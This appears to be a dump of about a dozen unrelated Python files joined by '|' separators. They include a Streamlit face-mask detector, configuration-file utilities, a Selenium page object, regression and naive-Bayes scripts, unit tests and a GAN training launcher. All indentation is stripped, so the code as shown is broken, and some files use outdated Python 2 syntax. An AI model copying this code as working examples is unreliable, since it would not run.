elif app_mode == "Show the source code":
readme_text.empty()
st.code(get_file_content_as_string("streamlit_app.py")) # change to st_newui.py" when uploaded to Github
elif app_mode == "Run the video detector":
readme_text.empty()
run_video_detector()
elif app_mode == "Run the image detector":
readme_text.empty()
run_image_detector()
# HELPER FUNCTIONS
def load_face_detector_model():
"""
Loads the face detector model (EXTENSION: Train our own face detector model)
"""
prototxt_path = os.path.sep.join(
["face_detector", "deploy.prototxt"])
weight_path = os.path.sep.join(
['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel'])
net = cv2.dnn.readNet(prototxt_path, weight_path)
return net
# This will make the app stay performant
@st.cache(allow_output_mutation=True)
def load_mask_model():
"""
Loads face mask detector model
"""
mask_model = load_model("mask_detector_ewan.model")
return mask_model
# Load both models
net = load_face_detector_model() # load face detector model
model = load_mask_model() # load mask detector model
# Create confidence level slider
confidence_selected = st.sidebar.slider(
'Select a confidence range', 0.0, 0.1, 0.5, 0.1) # display button to adjust 'confidence' between 0 - 0.5
# Helper functions to load the image and loop over the detection (for video and image options)
def detect_mask_video(image):
label='Starting...'
startX, startY, endX, endY = 0,0,0,0
color = 'g'
# Pre-process image to fit input tensor of face detection model
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # convert image from BGR to RGB
orig = image.copy() # get a copy of the image
(h, w) = image.shape[:2] # get image height and weight
blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), # construct a blob from the image
(104.0, 177.0, 123.0))
# Set processed image as the input to the model and run forward pass to compute output
net.setInput(blob) # pass the blob through the detection, get region that differ in propertes, and the face region
detection = net.forward() # run forward pass to compute output of layer
for i in range(0, detection.shape[2]): # loop through the detection
confidence = detection[0, 0, i, 2] # extract confidence value (something to do with how well the facial region is extracted)
if confidence > confidence_selected: # if the confidence is greater than the selected confidence from the side bar
# Generate face bounding box
box = detection[0, 0, i, 3:7] * np.array([w, h, w, h]) # get x and y coordinate for the bounding box
(startX, startY, endX, endY) = box.astype("int")
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(w-1, endX), min(h-1, endY)) # ensure bounding box does not exceed image frame
# Extract face
face = image[startY:endY, startX:endX]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) # extract face ROI, convert from BGR to RGB
face = cv2.resize(face, (128, 128)) # resize to input tensor size of mask model (128,128 - Ewan ; 224,224 - Crib)
face = img_to_array(face) # convert resized face to an array
face = preprocess_input(face) # preprocess the array
face = np.expand_dims(face, axis=0) # expand array to 2D
# Run extracted face through mask model and label prediction
(mask, withoutMask) = model.predict(face)[0]
label = "Mask on" if mask > withoutMask else "No Mask"
color = (0, 255, 0) if label == "Mask on" else (255, 0, 0) # bbox is Green if 'mask' else Red
label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # add label probability
# Display label and bbox rectangle in output frame
cv2.putText(image, label, (startX, startY - 10),
cv2.FONT_HERSHEY_SIMPLEX, 1.20, color, 2)
cv2.rectangle(image, (startX, startY), (endX, endY), color, 2)
else:
continue
return image, label, startX, startY, endX, endY, color # return image and label
def detect_mask_image(image):
# Pre-process image to fit input tensor of face detection model
image = cv2.imdecode(np.fromstring(image.read(), np.uint8), 1) # read the image from tempoary memory
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # convert image from BGR to RGB
orig = image.copy() # get a copy of the image
(h, w) = image.shape[:2] # get image height and weight
blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), # construct a blob from the image
(104.0, 177.0, 123.0))
net.setInput(blob) # pass the blob through the detection, get region that differ in propertes, and the face region
detection = net.forward()
for i in range(0, detection.shape[2]): # loop through the detection
confidence = detection[0, 0, i, 2] # extract confidence value
if confidence > confidence_selected: # if the confidence is greater than the selected confidence from the side bar
# Generate face bounding box
box = detection[0, 0, i, 3:7] * np.array([w, h, w, h]) # get x and y coordinate for the bounding box
(startX, startY, endX, endY) = box.astype("int")
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(w-1, endX), min(h-1, endY)) # ensure bounding box does not exceed image frame
# Extract face
face = image[startY:endY, startX:endX]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB) # extract face ROI, convert from BGR to RGB
face = cv2.resize(face, (128, 128)) # resize to 224, 224
face = img_to_array(face) # convert resized face to an array
face = preprocess_input(face) # preprocess the array
face = np.expand_dims(face, axis=0) # expand array to 2D
# Run extracted face through mask model and label prediction
(mask, withoutMask) = model.predict(face)[0]
label = "Mask" if mask > withoutMask else "No Mask" # define label
color = (0, 255, 0) if label == "Mask" else (255, 0, 0) # bbox is Green if 'mask' else Blue
label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100) # add label probability
# Display label and bbox rectangle in output frame
cv2.putText(image, label, (startX, startY - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.45, color, 2)
cv2.rectangle(image, (startX, startY), (endX, endY), color, 2) #display label and bbox rectangle in output frame
return image, label # return image and label
def run_video_detector():
st.title("Face Mask Detector Video App :mask:") # create App title
run = st.checkbox('Run') # checkbox to run video
FRAME_WINDOW = st.image([])
camera = cv2.VideoCapture(0)
while run:
_, frame = camera.read()
image, label, startX, startY, endX, endY, color = detect_mask_video(frame) # call mask detection model
FRAME_WINDOW.image(image) # NOTE: may need to crop this
else:
st.write('Stopped')
def run_image_detector():
st.title("Face Mask Detector Image App :mask:") # create App title
image_file = st.file_uploader("Upload image", type=['jpeg', 'jpg', 'png']) # streamlit function to upload file
if image_file is not None: # Confirm that the image is not a 0 byte file
st.sidebar.image(image_file, width=240) # then display a sidebar of the uploaded image
if st.button("Process"): # Click button to run algorithm on input image
image, label = detect_mask_image(image_file) # call mask detection model
st.image(image, width=420) # display the uploaded image
st.success('### ' + label) # display label
# Download a single file and make its content available as a string.
@st.cache(show_spinner=False)
def get_file_content_as_string(path):
url = 'https://raw.githubusercontent.com/streamlit/demo-self-driving/master/' + path # need to change URL
response = urllib.request.urlopen(url)
return response.read().decode("utf-8")
if __name__ == "__main__":
main() |
import os
import ucfg_utils
import ucfg_use
'''
This class is an entry point for reconfiguration utilities.
'''
class ConfigUtilities(object):
def __init__(self, options, component):
self.options = options
self.component = component
self.backedup = set([])
def setJavaProperty(self, filename, propertyName, newValue):
'''
Sets a single Java property (subsequent will be commented).
If the file doesn't exist it will be created
@param filename: filename to change
@param property: java property to change
@param newValue: new value of that property
'''
self.setJavaProperties(filename, { propertyName : newValue })
def setJavaProperties(self, filename, propsDict):
'''
Sets property, if it finds commented one it replaces the first occurrence.
The rest, if detected, will be commented out.
If the file doesn't exist it will be created
@param filename: filename to change
@param propsDict: dictionary with java properties to set
@todo: handle keys with spaces
@todo: handle comments after key & value pair
'''
filepath = self._prepare(filename)
if not os.path.exists(filepath):
open(filepath, 'w').close()
ucfg_utils.setJavaProperties(self.options, filepath, propsDict)
def updateJavaPropertyNames(self, filename, propsDict):
'''
Updates property names
@param filename: filename to change
@param propsDict: dictionary with java properties to to have names replaced
@todo: handle keys with spaces
@todo: handle comments after key & value pair
'''
filepath = self._prepare(filename)
if not os.path.exists(filepath):
open(filepath, 'w').close()
ucfg_utils.processJavaProperties(self.options, filepath, propsDict, 'key')
def commentJavaProperties(self, filename, propsDict):
'''
Comments properties
@param filename: filename to change
@param propsDict: dictionary with java properties to be commented with optional extra clarifications
@todo: handle keys with spaces
'''
filepath = self._prepare(filename)
if not os.path.exists(filepath):
open(filepath, 'w').close()
ucfg_utils.processJavaProperties(self.options, filepath, propsDict, 'comment')
def getJavaProperty(self, filename, name):
'''
Gets java property value
@param filename: filename to change
@param name: property key
@todo: handle keys with spaces
@todo: handle comments after key & value pair
'''
filepath = self._prepare(filename)
return ucfg_utils.getJavaProperty(filepath, name)
def getJavaPropertyKeys(self, filename):
'''
Gets java property keys list
@param filename: filename
@todo: handle keys with spaces
@todo: handle comments after key & value pair
'''
filepath = self._prepare(filename)
return ucfg_utils.getJavaPropertyKeys(filepath)
def setShellVariable(self, filename, variable, newValue):
'''
Sets a single shell configuration variable (subsequent will be commented).
@param filename: filename to change
@param variable: java property to change
@param newValue: new value of that property
'''
self.setShellVariables(filename, { variable : newValue })
def setShellVariables(self, filename, varsDict):
'''
Sets multiple shell configuration variables. Subsequent occurrences of those being set
will be commented.
@param filename: filename to change
@param propsDict: dictionary with shell variables to set
@todo: handle mutlilines (when line ends with backslash)
'''
filepath = self._prepare(filename)
ucfg_utils.setShellVariables(self.options, filepath, varsDict)
def setXMLAttribute(self, filename, xpath, name, value):
'''
Sets xml attribute value
'''
filepath = self._prepare(filename)
if not os.path.exists(filepath):
return
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
ucfg_utils.setXMLElementAttribute(self.options, doc, xpath, name, value)
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def removeXPathElements(self, filename, xPathExpression, nsPrefixMap = {}):
'''
Removes elements pointed by an XPath expression.
@param file: file to change
@param xPathExpression: XPath expression
@param nsPrefixMap: prefix map of namespaces used in XPath
'''
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
ucfg_utils.removeXPathElements(self.options,
doc, xPathExpression, nsPrefixMap)
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def setWSRFLiteProperty(self, filename, name, value):
'''
Sets property element in WSRFLite configuration file.
@param file: file to change
@param name: property's name
@param value: property's value
'''
self.setWSRFLiteProperties(filename, {name : value})
def setWSRFLiteProperties(self, filename, valsDict):
'''
Sets multiple properties in WSRFLite configuration file.
@param filename: file to change
@param valsDict: properties
'''
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
for p in sorted(valsDict):
ucfg_use.setWSRFLiteProperty(self.options, doc, p, valsDict[p], 'value')
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def setWSRFLitePropertyKeys(self, filename, valsDict):
'''
Updates keys of multiple properties in WSRFLite configuration file.
@param filename: file to change
@param valsDict: properties
'''
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
for p in sorted(valsDict):
ucfg_use.setWSRFLiteProperty(self.options, doc, p, valsDict[p], 'key')
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def commentWSRFLiteProperties(self, filename, valsDict):
'''
Comments properties in WSRFLite configuration file.
@param filename: file to change
@param valsDict: properties
'''
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
for p in sorted(valsDict):
ucfg_use.setWSRFLiteProperty(self.options, doc, p, valsDict[p], 'comment')
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def getWSRFLiteProperties(self, filename):
'''
Returns all properties defined in WSRFLite configuration file.
@param filename: file
'''
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
return doc.xpath("/services/property")
def setXNJSProperty(self, filename, name, value):
'''
Sets property element in XNJS configuration file.
@param file: file to change
@param name: property's name
@param value: property's value
'''
self.setXNJSProperties(filename, {name : value})
def setXNJSProperties(self, filename, valsDict):
'''
Sets multiple properties in XNJS configuration file.
@param filename: file to change
@param valsDict: properties
'''
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
for prop in sorted(valsDict):
ucfg_use.setXNJSEngineProperty(self.options, doc, prop, valsDict[prop])
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def toggleWSRFLiteService(self, filename, serviceName, enabled = True):
'''
Sets enabled attribute in WSRFLite configuration file.
@param filename: file
@param serviceName: service name
@param enabled: if service is enabled (default: True)
'''
self.toggleWSRFLiteServices(filename, {serviceName: enabled})
def toggleWSRFLiteServices(self, filename, servicesDict):
'''
Sets enabled attribute in WSRFLite configuration file.
@param filename: file
@param servicesDict: pairs, service name, Boolean
'''
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
for prop in sorted(servicesDict):
ucfg_use.toggleWSRFLiteService(self.options,
doc, prop, servicesDict[prop])
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def appendXNJSProcessor(self, filename, processorClass):
'''
Appends processor to the JSDL Processing Chain.
'''
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
ucfg_use.appendToJSDLProcessingChain(self.options, doc, processorClass)
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def addXMLStringElementAfterXPath(self, filename, xmlString2Add, xPathPosition = None, nsPrefixMap = {}):
filepath = self._prepare(filename)
doc = ucfg_utils.loadXMLDocumentFromFile(self.options, filepath)
ucfg_utils.addAdditionalXML(self.options, doc, xmlString2Add, xPathPosition, nsPrefixMap)
ucfg_utils.writeXMLDocument(self.options, doc, filepath)
def appendLinesIfNotAlreadyExist(self, filename, linesList):
'''
Appends lines to the file, but only if a line did not exist so far.
'''
filepath = self._prepare(filename)
ucfg_utils.appendLinesIfNotAlreadyExist(self.options, filepath, linesList)
def removeLinesIfExist(self, filename, linesList):
'''
Removes existing lines.
'''
filepath = self._prepare(filename)
ucfg_utils.removeLinesIfExist(self.options, filepath, linesList)
def replaceFileLines(self, filename, linesDict):
'''
Replaces existing lines.
'''
filepath = self._prepare(filename)
ucfg_utils.replaceFileLines(self.options, filepath, linesDict)
def _prepare(self, filename):
'''
Prepares backup if needed and returns recolved full path.
'''
filepath = ucfg_utils.getFile(self.options, self.component, filename);
if not(filepath in self.backedup) and os.path.isfile(filepath):
ucfg_utils.backupFile(self.options, filepath)
self.backedup.add(filepath)
return filepath
|
'''
Created on Jul 3, 2013
@author: padelstein
'''
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from robot.libraries.BuiltIn import BuiltIn
class RecommendModal():
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
def __init__(self):
self._webd_wrap = BuiltIn().get_library_instance('WebDriverWrapper')
def _confirm_modal(self):
self._webd_wrap.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'fancybox-inner')), 'User modal not present')
def close_modal(self):
self._confirm_modal()
_close = self._webd_wrap._driver.find_element_by_class_name('fancybox-skin').find_element_by_xpath('a')
self._webd_wrap._driver.execute_script("(arguments[0]).click()", _close)
# confirms the modal is gone
self._webd_wrap.wait.until(EC.invisibility_of_element_located((By.CLASS_NAME, 'fancybox-inner')))
########################################################################
def submit_recommend(self):
self._confirm_modal()
self.enter_email()
self.click_checkbox()
self.enter_message()
self.submit()
def enter_email(self):
_recommend_email_form = self._webd_wrap._driver.find_element_by_id('recommend-modal').find_element_by_id('recommend-email-form')
self._webd_wrap._driver.execute_script('$(arguments[0]).val(arguments[1])', _recommend_email_form.find_elements_by_class_name('textboxlist-bit-editable-input')[0], '1@zolabooks.com')
def click_checkbox(self):
checkbox = self._webd_wrap._driver.find_element_by_id('uniform-share-with-followers').find_element_by_xpath('span/input')
self._webd_wrap._driver.execute_script("$(arguments[0]).click()", checkbox)
def enter_message(self):
_recommend_email_form = self._webd_wrap._driver.find_element_by_id('recommend-email-form')
self._webd_wrap._driver.execute_script('$(arguments[0]).val(arguments[1])', _recommend_email_form.find_elements_by_name('message')[0], 'test')
def submit(self):
send = self._webd_wrap._driver.find_element_by_id('recommend-modal').find_element_by_id("recommend-email-form").find_element_by_xpath("footer/input")
self._webd_wrap._driver.execute_script("(arguments[0]).click()", send)
|
from sklearn import linear_model
import pandas as pd
import numpy as np
from sklearn.datasets import load_boston
from sklearn.cross_validation import train_test_split
boston=load_boston()
print "here is the data",boston
df_x=pd.DataFrame(boston.data,columns=boston.feature_names)
df_y=pd.DataFrame(boston.target)
print "description of features",df_x.describe()
print "description of taget",df_y.describe()
x_train,x_test,y_train,y_test=train_test_split(df_x,df_y,test_size=0.2,random_state=4)
reg=linear_model.LinearRegression()
reg.fit(x_train,y_train)
print "the regression coefficient are",reg.coef_
a=reg.predict(x_test)
print "the predcition for ",df_y ,"are ",a
df_a=pd.DataFrame(a)
print "the squred error is",np.mean((a-y_test)**2)
|
from unittest import TestCase
import simplejson as S
class TestDefault(TestCase):
def test_default(self):
self.assertEquals(
S.dumps(type, default=repr),
S.dumps(repr(type)))
|
__author__ = 'pawan'
import csv
import sys
from collections import defaultdict
from collections import Counter
import random
import math
def prepare_topic_likelihood_data(filename):
"""Generates the prior for the topicID and data structure
The likelihood dict contains the topicID count for each user i.e number of
articles read by each user for a particular topic ID.
:param filename: pass the file for the clicked data and the eamiled data
logarticlejoin.csv : contains the clicked data
emailarticlejoin.csv: contains the emailed data
:return: the priors of topicid in the each file and the data structure containing
all the counts for individual topicIDs for each user.
"""
priors = Counter()
likelihood = defaultdict(Counter)
logfile = open(filename, 'r')
reader = csv.reader(logfile)
header = reader.next()
for line in reader:
userid = line[0]
topicid = line[2]
priors[topicid] += 1
likelihood[userid][topicid] += 1
return priors, likelihood
def prepare_type_likelihood_data(filename):
"""Generates the prior for the tyepID and data structure
The likelihood dict contains the typeID count for each user i.e number of
articles read by each user for a particular type ID.
:param filename: pass the file for the clicked data and the eamiled data
logarticlejoin.csv : contains the clicked data
emailarticlejoin.csv: contains the emailed data
:return: the priors of typeID in the each file and the data structure containing
all the counts for individual typeIDs for each user.
"""
priors = Counter()
likelihood = defaultdict(Counter)
logfile = open(filename, 'r')
reader = csv.reader(logfile)
header = reader.next()
for line in reader:
userid = line[0]
typeid = line[3]
priors[typeid] += 1
likelihood[userid][typeid] += 1
return priors, likelihood
"""
def random_likelihood(line, priors, likelihood):
categories = priors.keys()
return categories[int(random.random() * len(categories))]
"""
"""
def max_prior_likelihood(line,priors, likelihood):
categories = priors.keys()
return max(priors, key = lambda x: priors[x])
"""
## created two new feaatures called the topic_throughput and type throughput
## although not used in the model but can be used in future model to further
## create a weighted model.
def naive_likelihood(line,priors, likelihood,type_likelihood,emailfilename):
"""Generate the likelihood of a user viewing a article
Takes in the test line and the priors and likelihood for the accesslog file
and returns the likelihood of the user clicking a link.
:param line:
:param priors:
:param likelihood:
:param emailfilename:
:return:likelihood of the user clicking using the posterior probability of typeid and topicID
for the user.
"""
e_topic_priors, e_topic_likelihood = prepare_topic_likelihood_data(emailfilename)
e_type_priors, e_type_likelihood = prepare_type_likelihood_data(emailfilename)
line = line.strip().split(',')
topicid = line[2]
typeid = line[3]
userid = line[0]
##Calculates the number of articles for this topicID sent to the user
e_topic_prior = e_topic_priors[topicid]
##Calculate teh number of articles sent to the user of this typeID
e_type_prior = e_type_priors[typeid]
##Total number of articles in the sent file
total_articles_sent = sum(e_topic_priors.values())
##Total number of articles sent to a particular userID
nArticles_sent = float(sum(e_topic_likelihood[userid].values()))
##Total number of articles read by the userID
nArticles_read = float(sum(likelihood[userid].values()))
##Fraction of articles read by the user add 1 to avoid divide by zero.
prior_seen = (nArticles_read + 1)/ (nArticles_sent + 1)
##Calculates P(topicID | Seen) for a given topicID
topicid_seen = max(1E-4,likelihood[userid][topicid] / nArticles_read)
##Calculate P(typeID | Seen) for a given typeID
typeid_seen = max(1E-4, type_likelihood[userid][typeid] / nArticles_read)
## calculate P(Seen|topicID) posterior for a given topicID
topic_prob = (prior_seen * topicid_seen)
## calculate P(Seen|typeID) posterior for a given typeID
type_prob = (prior_seen * typeid_seen )
print topic_prob, ": Likelihood of reading the topic"
print type_prob, ": Likelihood of reading in type"
## calculates the fraction of articles read by the user for a particular topicID to the number
## of articles for a particular topicID sent to the user.
## using max to avoid divide by zero and in numerator to stop mulitply by 0.
topic_read_throughput = max(1,float(likelihood[userid][topicid])) / float(max(1,(e_topic_likelihood[userid][topicid])))
## calculates the fraction of articles read by the user for a particular typeID to the number
## of articles for a particular typeID sent to the user
type_read_throughput = max(1,float(type_likelihood[userid][typeid])) / float(max(1,(e_type_likelihood[userid][typeid])))
# Features Generated explained in the report
print topic_read_throughput, ": Topic throughput"
print type_read_throughput, ": Type throughput"
## calculates P(Seen|topicID,typeID) = P(Seen|topicID) * P(Seen|typeID)
joint_likelihood = topic_prob * type_prob
return (userid, topicid,typeid, math.log(joint_likelihood))
def main():
"""
accesslogile: pass the log file in here
eamilarticlesent: pass the corresponding email sent file
:return:
"""
accesslogfile = sys.argv[1]
emailarticlesent = sys.argv[2]
topic_priors, topic_likelihood = prepare_topic_likelihood_data(accesslogfile)
type_priors, type_likelihood = prepare_type_likelihood_data(accesslogfile)
line = "5,16654,8,23,1,Apr,3,3190"
userid, topicid, typeid, likelihood = naive_likelihood(line,topic_priors,topic_likelihood,type_likelihood,emailarticlesent)
print "The probability of user {0} viewing the topic {1} and typeid {2} is {3}".format(userid,topicid,typeid,likelihood)
writefile = open('output.txt', 'w')
##Uncomment the code if you don't want to run on a testing file and want to see the likelihood for a individual user
## for a particular article id. The log and email file have been parsed in the above format and will take csv values.
## individual likelihood can be observed over a period of time by entering line and runnign it 3 times to observe the
## how the likelihood changes.
"""testfile = sys.argv[3]
testentries = open(testfile,'r')
for line in testentries:
userid, topicid, typeid, likelihood = naive_likelihood(line,topic_priors,topic_likelihood,type_likelihood,emailarticlesent)
str1 = "The probability of user {0} viewing the topic {1} and typeid {2} is {3}".format(userid,topicid,typeid,likelihood)
print str1
writefile.write(str1)
"""
# Boiler plate syntax to call main.
if __name__ == "__main__":
main()
|
name = input().strip()
code = [1] + [ord(i) - 96 for i in name]
no_moves = 0
for i in range(len(code) - 1):
no_moves += min(abs(code[i] - code[i+1]), 26 - abs(code[i] - code[i+1]))
print(no_moves)
|
from unittest.case import TestCase
from pythonbrasil.lista_2_estrutura_de_decisao.ex_11_organizacoes_tabajara import obter_porcentagem_de_aumento
class ObterPorcentagemDeAumentoTests(TestCase):
def test_salario_igual_ou_abaixo_de_280(self):
porcentagem = obter_porcentagem_de_aumento(200)
self.assertEqual(porcentagem, 20)
porcentagem = obter_porcentagem_de_aumento(280)
self.assertEqual(porcentagem, 20)
def test_salario_igual_ou_abaixo_de_700(self):
porcentagem = obter_porcentagem_de_aumento(500)
self.assertEqual(porcentagem, 15)
porcentagem = obter_porcentagem_de_aumento(700)
self.assertEqual(porcentagem, 15)
def test_salario_igual_ou_abaixo_de_1500(self):
porcentagem = obter_porcentagem_de_aumento(1000)
self.assertEqual(porcentagem, 10)
porcentagem = obter_porcentagem_de_aumento(1500)
self.assertEqual(porcentagem, 10)
def test_salario_maior_que_1500(self):
porcentagem = obter_porcentagem_de_aumento(1501)
self.assertEqual(porcentagem, 5)
porcentagem = obter_porcentagem_de_aumento(30000)
self.assertEqual(porcentagem, 5)
|
import os
import logging
import argparse
import numpy as np
from train_and_evaluate import evaluate, train
from model.net import Generator, Discriminator
from data_loader import fetch_dataloader
import utils
import torch
parser = argparse.ArgumentParser()
parser.add_argument('--output_dir', default='Result',
help="Result folder")
parser.add_argument('--train_path', default='Data/trainset.nc',
help="The training dataset path")
parser.add_argument('--restore_from', default=None,
help="Optional, directory or file containing weights to reload before training")
if __name__ == '__main__':
# Load the directory from commend line
args = parser.parse_args()
train_path = args.train_path
output_dir = args.output_dir
restore_from = args.restore_from
os.makedirs(output_dir + '/outputs', exist_ok = True)
os.makedirs(output_dir + '/figures', exist_ok = True)
os.makedirs(output_dir + '/model', exist_ok = True)
# Set the logger
utils.set_logger(os.path.join(args.output_dir, 'train.log'))
if restore_from is None:
restore = 0
else:
restore = 1
# Load parameters from json file
json_path = os.path.join(args.output_dir,'Params.json')
assert os.path.isfile(json_path), "No json file found at {}".format(json_path)
params = utils.Params(json_path)
# Add attributes to params
params.output_dir = output_dir
params.lambda_gp = 10.0
params.n_critic = 1
params.cuda = torch.cuda.is_available()
params.batch_size = int(params.batch_size)
params.numIter = int(params.numIter)
params.noise_dims = int(params.noise_dims)
params.label_dims = int(params.label_dims)
params.gkernlen = int(params.gkernlen)
# fetch dataloader
dataloader = fetch_dataloader(train_path, params)
# Define the models
generator = Generator(params)
discriminator = Discriminator(params)
if params.cuda:
generator.cuda()
discriminator.cuda()
# Define the optimizers
optimizer_G = torch.optim.Adam(generator.parameters(), lr=params.lr_gen, betas=(params.beta1_gen, params.beta2_gen))
optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=params.lr_dis, betas=(params.beta1_dis, params.beta2_dis))
# train the model and save
logging.info('Start training')
loss_history = train((generator, discriminator), (optimizer_G, optimizer_D), dataloader, params)
# plot loss history and save
utils.plot_loss_history(loss_history, output_dir)
# Generate images and save
wavelengths = [w for w in range(500, 1301, 50)]
angles = [a for a in range(35, 86, 5)]
logging.info('Start generating devices for wavelength range {} to {} and angle range from {} to {} \n'
.format(min(wavelengths), max(wavelengths), min(angles), max(angles)))
evaluate(generator, wavelengths, angles, num_imgs=500, params=params)
|
# CHAPTER 1
# Figure 1.1
import numpy as np
import matplotlib.pyplot as plt
p = 1/2
n = np.arange(0,10)
X = np.power(p,n)
plt.bar(n,X)
# Binomial Theorem
from scipy.special import comb, factorial
n = 10
k = 2
comb(n, k)
factorial(k)
# Python code to perform an inner product
import numpy as np
x = np.array([[1],[0],[-1]])
y = np.array([[3],[2],[0]])
z = np.dot(np.transpose(x),y)
print(z)
#
# # Python code to compute the norm
import numpy as np
x = np.array([[1],[0],[-1]])
x_norm = np.linalg.norm(x)
print(x_norm)
# # Python code to compute the weighted norm
import numpy as np
W = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
x = np.array([[2],[-1],[1]])
z = np.dot(x.T, np.dot(W,x))
print(z)
# Python code to compute a matrix inverse
import numpy as np
X = np.array([[1, 3], [-2, 7], [0, 1]])
XtX = np.dot(X.T, X)
XtXinv = np.linalg.inv(XtX)
print(XtXinv)
# Python code to solve X beta = y
import numpy as np
X = np.array([[1, 3], [-2, 7], [0, 1]])
y = np.array([[2],[1],[0]])
beta = np.linalg.lstsq(X, y, rcond=None)[0]
print(beta) |
from enum import Enum
class Element(Enum):
WATER = "water"
EARTH = "earth"
FIRE = "fire"
LIGHT = "light"
DARK = "dark"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.